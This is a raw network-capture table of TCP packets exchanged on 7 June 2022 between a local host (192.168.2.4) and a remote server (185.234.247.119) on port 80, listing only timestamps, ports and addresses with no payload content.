                                                                                                                                                                      Jun 7, 2022 18:45:11.900753021 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900780916 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900809050 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900825024 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.900835037 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900856972 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.900861979 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900885105 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.900887966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900914907 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900940895 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900965929 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.900970936 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.901007891 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.901846886 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.901864052 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.901901960 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.901930094 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.901942968 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.901947975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.901976109 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.901990891 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902002096 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902023077 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902029991 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902050018 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902055025 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902081966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902111053 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902115107 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902123928 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902210951 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902826071 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902861118 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902885914 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902896881 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902905941 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902932882 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902959108 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.902966976 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902978897 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.902987003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.903023005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.903038979 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.903057098 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.903089046 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.903117895 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.903142929 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.903168917 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.903196096 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.903208017 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.903260946 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.904004097 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.904042006 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.904067993 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.904093981 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.904120922 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.904133081 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.904146910 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.904153109 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.904171944 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962019920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962033987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962060928 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962085962 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.962093115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962117910 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962131977 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.962142944 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962167978 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962177992 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.962193012 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.962219000 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.966312885 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966360092 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966387987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966417074 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966442108 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966469049 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966466904 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.966495037 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966520071 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966547966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966562986 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.966573954 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966599941 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966624022 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.966624975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.966671944 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.967683077 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967727900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967753887 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967778921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967786074 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.967803955 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967809916 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.967830896 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967855930 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967855930 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.967880964 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967906952 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967909098 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.967931986 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967950106 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.967959881 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.967986107 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968012094 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.968656063 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968709946 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968739033 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968765020 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968771935 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.968792915 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968801022 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.968823910 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968844891 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.968852997 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968888044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968910933 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.968918085 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968949080 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.968969107 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.968975067 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969001055 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969021082 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.969026089 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969079018 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.969643116 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969654083 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969682932 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969708920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969733000 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969733000 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.969758987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969784021 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969796896 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.969810963 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969836950 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969836950 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.969862938 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969877005 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.969887972 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969913006 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.969922066 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.969980955 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.970861912 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.970900059 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.970923901 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.970948935 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.970969915 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.970973015 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.970999002 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.971023083 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.971035957 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.971050978 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.971061945 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.971076012 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.971101999 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.971105099 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.971127033 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.971153975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.971175909 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.971210003 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.988393068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993551970 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993591070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993616104 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993640900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993665934 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993690014 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993712902 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.993715048 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993731022 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.993741989 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993753910 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.993768930 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993777037 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.993797064 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993810892 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.993822098 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.032428026 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.032432079 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.032459974 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.032464981 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.032512903 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.032521963 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033025980 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033061028 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033085108 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033108950 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033128977 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033133030 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033155918 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033160925 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033185005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033209085 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033221960 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033236027 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033261061 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033271074 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033284903 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033293009 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033309937 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033335924 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034435034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034467936 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034498930 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034506083 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034524918 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034548044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034548998 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034576893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034601927 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034626007 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034627914 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034648895 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034661055 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034676075 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034698009 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034713984 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034718990 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034739971 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034749985 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034792900 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035362005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035392046 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035418034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035443068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035465956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035470009 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035490990 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035509109 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035515070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035540104 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035562992 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035563946 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035590887 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035600901 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035614967 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035638094 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035640001 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035701990 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035973072 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036001921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036026001 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036048889 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036062956 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036076069 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036099911 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036107063 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036123991 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036145926 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036149025 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036168098 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036190987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036207914 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036215067 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036236048 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036247969 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036290884 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.054375887 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058554888 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058593035 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058617115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058641911 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058669090 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058686018 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058691978 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058703899 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058717012 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058743000 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058768034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058773994 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058793068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058820009 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058840990 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058842897 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058878899 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.060990095 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061017990 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061037064 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061091900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061125040 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.061129093 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061146975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061163902 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061181068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061194897 CEST4978180192.168.2.4185.234.247.119
